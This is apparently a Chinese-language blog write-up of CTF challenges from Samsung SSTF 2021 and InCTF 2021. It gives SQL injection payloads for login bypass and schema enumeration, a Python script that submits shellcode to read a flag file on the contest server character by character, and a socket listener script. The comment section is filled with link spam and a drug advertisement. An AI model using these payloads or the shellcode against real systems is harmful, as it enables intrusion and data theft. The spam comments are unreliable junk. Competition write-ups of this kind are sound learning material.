最近没什么时间摸鱼了两场比赛

Samsung Security Tech Forum 2021

sqli101

Mission: login as an admin using SQL Injection

Hint - SQL query

select id from users where id='{$_GET["id"]}' and pw='{$_GET["pw"]}'

要求和提示给的很明显,简单测试一下过滤了or

联合注入 payload:

?id=a&pw=a'/**/union/**/select/**/'admin

sqli1

sqli102

一个根据关键词查询功能 ,给了hint

<?php
include "./config.php";
$succ = -1;
if($_GET['showsrc']) {
    show_source("step1.php");
    die;
}
if($_GET['searchkey']) {
    $succ = 0;
    $query = "select * from books where title like '%".$_GET['searchkey']."%'";
    $db = dbconnect("sqli102_step3");
    $result = mysqli_query($db,$query);
    mysqli_close($db);
    if($result) {
        $rows = mysqli_num_rows($result);
    }
}

?>

<!-- source: https://colorlib.com/wp/template/colorlib-search-23/ -->
<html>
    <head>
        <title>SQLi 102: Step 1</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="author" content="colorlib.com">
        <style id="" media="all">/* devanagari */
        @font-face {
          font-family: 'Poppins';
          font-style: normal;
          font-weight: 400;
          src: url(/fonts.gstatic.com/s/poppins/v15/pxiEyp8kv8JHgFVrJJbecmNE.woff2) format('woff2');
          unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF9, U+200C-200D, U+20A8, U+20B9, U+25CC, U+A830-A839, U+A8E0-A8FB;
        }
        </style>
        <link href="style.css" rel="stylesheet" />
    </head>
    <body>
        <div class="s130">
            <form>
                <table border="0">
                    <tr>
                        <td style="font-size: 28px; text-align: left"><strong>A book search service</strong></td>
                        <td style="text-align: right; vertical-align: bottom"><a href="?showsrc=True">[HINT]</a></td>
                    </tr>
                </table>
                <div class="inner-form">
                    <div class="input-field first-wrap">
                        <div class="svg-wrapper">
                            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">
                                <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path>
                            </svg>
                        </div>
                        <input id="search" type="text" name="searchkey" placeholder="Enter keyword here" />
                    </div>
                    <div class="input-field second-wrap">
                        <button class="btn-search" type="submit">SEARCH</button>
                    </div>
                </div>

<?
    if ($rows > 0) {
?>
                <br>
                <h2>Search Result</h2>
                <table>
                    <thead>
                        <tr>
                            <th width="10%">#</th>
                            <th width="50%">Title</th>
                            <th width="30%">Author</th>
                            <th width="10%">Price</th>
                        </tr>
                    </thead>
                    <tbody>

<?
    for($idx = 1; $idx <= $rows; $idx++) {
        $row = mysqli_fetch_assoc($result);
        echo "<tr><th scope=\"row\">".$idx."</th>";
        echo "<td>".$row["title"]."</td>";
        echo "<td>".$row["author"]."</td>";
        echo "<td>".$row["price"]."</td></tr>";
    }
?>
                    </tbody>
                </table>
<?
    } else if ($succ === 0) {
?>
                <br>
                <h2>Sorry, no results for your request.</h2>
<?
    } else {
?>
                <br>
                <h2 style="padding-left:30px">Quiz#1: How many columns are in the `<strong>count_me</strong>` table?</h2>
<?
    }
?>

            </form>
        </div>
    </body>
</html>

主要看关键代码

    $query = "select * from books where title like '%".$_GET['searchkey']."%'";

sql的模糊匹配,先测试字段,为8时有回显

xxxxxxxxxxxxx%' union select * from books order by 8#

image-20210817132712125

于是 联合注入,获取表名

xxxxxxxxxxxxx%' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8#

image-20210817132904347

看到findme,获取列名,拿到flag

xxxxxxxxxxxxx%' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='findme'),3,4,5,6,7,8#

sqli2-2

SW Expert Academy

Are you poor at algorithm coding? Here is amazing platform to enhance your coding skill!

题目要求

image-20210817133926294

按要求搓了一个简陋的代码

#include<stdio.h>
int main(){
    int Gcd(int m,int n)
    {
        if(n==0)
        return m;
        return Gcd(n,m%n);
    }
    int a[6],b[6];
    int win=0,i=0,j=0;
    for(i=0;i<6;i++)
    {
        scanf("%d",&a[i]);
    }
    for(i=0;i<6;i++)
    {
        scanf("%d",&b[i]);
    }
    for(i=0,j=0;i<6;j++)
    {
        if(a[i]>b[j])
        {
            win++;
        }
        if(j==6)
        {
            i++;
            j=-1;
        }
    }
    printf("%d/%d",win/Gcd(win,36),36/Gcd(win,36));
    return 0;
}

然后通过了三个测试案例,就会返回了三个True,然后由前端弹窗提示通过了几个测试点。

发现通过也没用,然后再F12里看到

<!-- Flag is placed at /flag.txt in executor instance. -->
<input type="hidden" name="sample_answer_code" value="aW50IGFbMTJdO2ZvcihpbnQgaT0wO2k8MTI7aSsrKXNjYW5mKCIlZCIsYStpKTtpbnQgYW5zPTA7aW50IG1vZD0zNjtmb3IoaW50IGk9MDtpPDY7aSsrKWZvcihpbnQgaj02O2o8MTI7aisrKWlmKGFbaV0+YVtqXSlhbnMrKztmb3IoaW50IGk9MjtpPDM2O2krKyl3aGlsZShhbnM+PWkmJmFucyVpPT0wJiZtb2QlaT09MClhbnMvPWksbW9kLz1pO3ByaW50ZigiJWQvJWQiLGFucyxtb2QpOw==">

base64解密之后拿到代码

int a[12];for(int i=0;i<12;i++)scanf("%d",a+i);int ans=0;int mod=36;for(int i=0;i<6;i++)for(int j=6;j<12;j++)if(a[i]>a[j])ans++;for(int i=2;i<36;i++)while(ans>=i&&ans%i==0&&mod%i==0)ans/=i,mod/=i;printf("%d/%d",ans,mod);

?????

知道了文件路径,尝试 fopen读文件 然后按位比较爆破,open被过滤了,利用system 反弹shell也被过滤了。但思路没问题了,读文件,比较,根据返回值判断。

我写了几行软弱无力的requests,然后Pandaos 大哥 写了shellcode来读取文件进行爆破。

import requests
import string
url='http://swexpertacademy.sstf.site/code'
def req(payload):
    while True:
        data = {'code': payload}
        res = requests.post(url, data=data)
        if res.text is None:
            continue
        return res.text


def test_one(pos, ch):
    code = """int myfunc();
    myfunc();
  return 0;
}
__attribute__((section(".text")))
const unsigned char code[] = {
    0x55,0x48,0x89,0xe5,0x48,0x83,0xec,0x50,0x6a,0x74,0x48,0xb8,0x2f,0x66,0x6c,0x61,0x67,0x2e,0x74,0x78,0x50,0x48,0x89,0x7c,0x24,0x20,0x48,0x89,0xe7,0x31,0xd2,0x31,0xf6,0x6a,0x2,0x58,0xf,0x5,0x48,0x89,0xc7,0x31,0xc0,0x6a,0x40,0x5a,0x48,0x8b,0x74,0x24,0x20,0xf,0x5,0x48,0x89,0xec,0x5d,0xc3
};

int myfunc() {
    char buffer[100];
    int pos = %d;
    (*(void(*)(char *)) code)(buffer);
    if(buffer[pos] == '%s') {
        int a[12];for(int i=0;i<12;i++)scanf("%%d",a+i);int ans=0;int mod=36;for(int i=0;i<6;i++)for(int j=6;j<12;j++)if(a[i]>a[j])ans++;for(int i=2;i<36;i++)while(ans>=i&&ans%%i==0&&mod%%i==0)ans/=i,mod/=i;printf("%%d/%%d",ans,mod);
    }
""" % (pos, ch)
    return req(code)

flag = ''
for i in range(60):
    for ch in string.printable:
        if 'true' in test_one(i, ch):
            flag += ch
            print(flag)
            break

本地挂代理都跑得慢,丢服务器上

image-20210817134946288

Inctf 2021

Listen

一道network,给了一个ovpn文件,然后打开openvpn连接可以看到,连接到了 34.87.108.160 并且不断接收到数据

image-20210817135313498

但是抓包一直没有抓到flag

解法是操作原生的 socket

由于菜,还没学socket,脚本是队友写的。自己添加了一些判断,然后顺便学习了一点点socket相关的知识,脚本如下

import socket
import re
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
start = 'inctf'
end = '}'
def listen():
    skt.bind(('172.30.0.14',31337))
    skt.listen(1)
    handle,addr=skt.accept()
    for i in range(4):
        text = handle.recv(2048).decode()
        flag = re.findall(start+"(.+)"+end,text)
        if flag:
            print(start+flag[0]+end)
    
listen()

image-20210817135625800

标签: none

已有 15 条评论

  1. Some Latest Challenges Write Up - R1gelX`Blog
    amohxtqqkhn
    [url=http://www.g5o5rc38c11n3jb1p9z4i4irj3d7735hs.org/]umohxtqqkhn[/url]
    mohxtqqkhn http://www.g5o5rc38c11n3jb1p9z4i4irj3d7735hs.org/

  2. Cheap Nexium Prescriptions buying cheap cialis online

  3. Some Latest Challenges Write Up - R1gelX`Blog
    [url=http://www.g21bfm88vq17h870248sn1knm8x7as8js.org/]ucgnyevsgj[/url]
    cgnyevsgj http://www.g21bfm88vq17h870248sn1knm8x7as8js.org/
    acgnyevsgj

  4. Some Latest Challenges Write Up - R1gelX`Blog
    atckyilqgoy
    tckyilqgoy http://www.g0u6qx3j176j43q4aee8k7q4qk3o783ys.org/
    [url=http://www.g0u6qx3j176j43q4aee8k7q4qk3o783ys.org/]utckyilqgoy[/url]

  5. Some Latest Challenges Write Up - R1gelX`Blog
    [url=http://www.g4023wtu183jx30rlmzu00yol102hd43s.org/]ucwhzylfcqc[/url]
    acwhzylfcqc
    cwhzylfcqc http://www.g4023wtu183jx30rlmzu00yol102hd43s.org/

  6. Some Latest Challenges Write Up - R1gelX`Blog
    nclmbqtmpq http://www.gpoyw823b3yzk837w66g9sx014u40o1ls.org/
    [url=http://www.gpoyw823b3yzk837w66g9sx014u40o1ls.org/]unclmbqtmpq[/url]
    anclmbqtmpq

  7. Some Latest Challenges Write Up - R1gelX`Blog
    amzckozogf
    [url=http://www.ghsvir6k16r0c3g76e189ekeb11853j8s.org/]umzckozogf[/url]
    mzckozogf http://www.ghsvir6k16r0c3g76e189ekeb11853j8s.org/

  8. Some Latest Challenges Write Up - R1gelX`Blog
    [url=http://www.g4h9312le323wfxle6u3698hzoun87b3s.org/]uhobwpbjgn[/url]
    hobwpbjgn http://www.g4h9312le323wfxle6u3698hzoun87b3s.org/
    ahobwpbjgn

  9. Some Latest Challenges Write Up - R1gelX`Blog
    gcyiinxojb http://www.g427pix91e84hs6fad7hr87xm5wo9247s.org/
    [url=http://www.g427pix91e84hs6fad7hr87xm5wo9247s.org/]ugcyiinxojb[/url]
    agcyiinxojb

  10. Some Latest Challenges Write Up - R1gelX`Blog
    bzrjsezw http://www.g3r9g8qx3ze2g8vr4bsy7744vuq88291s.org/
    [url=http://www.g3r9g8qx3ze2g8vr4bsy7744vuq88291s.org/]ubzrjsezw[/url]
    abzrjsezw

  11. R1gelX`Blog » Some Latest Challenges Write Up
    mpgkjdtsrm http://www.g0d621eaxdt4gm27o64oy943c7733hkbs.org/
    ampgkjdtsrm
    [url=http://www.g0d621eaxdt4gm27o64oy943c7733hkbs.org/]umpgkjdtsrm[/url]

  12. R1gelX`Blog » Some Latest Challenges Write Up
    [url=http://www.g9ir6335vewz70v9349a1tp30abv1y7js.org/]uqdlidgjsf[/url]
    aqdlidgjsf
    qdlidgjsf http://www.g9ir6335vewz70v9349a1tp30abv1y7js.org/

  13. R1gelX`Blog » Some Latest Challenges Write Up
    [url=http://www.g217341h0bstl3l2y33q77vseo66kcr8s.org/]uhmixmlenpc[/url]
    hmixmlenpc http://www.g217341h0bstl3l2y33q77vseo66kcr8s.org/
    ahmixmlenpc

  14. R1gelX`Blog » Some Latest Challenges Write Up
    swnnzisck http://www.g27515124clf5fdxk955rgxgk5h8p05zs.org/
    aswnnzisck
    [url=http://www.g27515124clf5fdxk955rgxgk5h8p05zs.org/]uswnnzisck[/url]

  15. R1gelX`Blog » Some Latest Challenges Write Up
    oblpkrwetd http://www.gk99r3ui71b33xsyi5i74j5f82x0t2f5s.org/
    [url=http://www.gk99r3ui71b33xsyi5i74j5f82x0t2f5s.org/]uoblpkrwetd[/url]
    aoblpkrwetd

添加新评论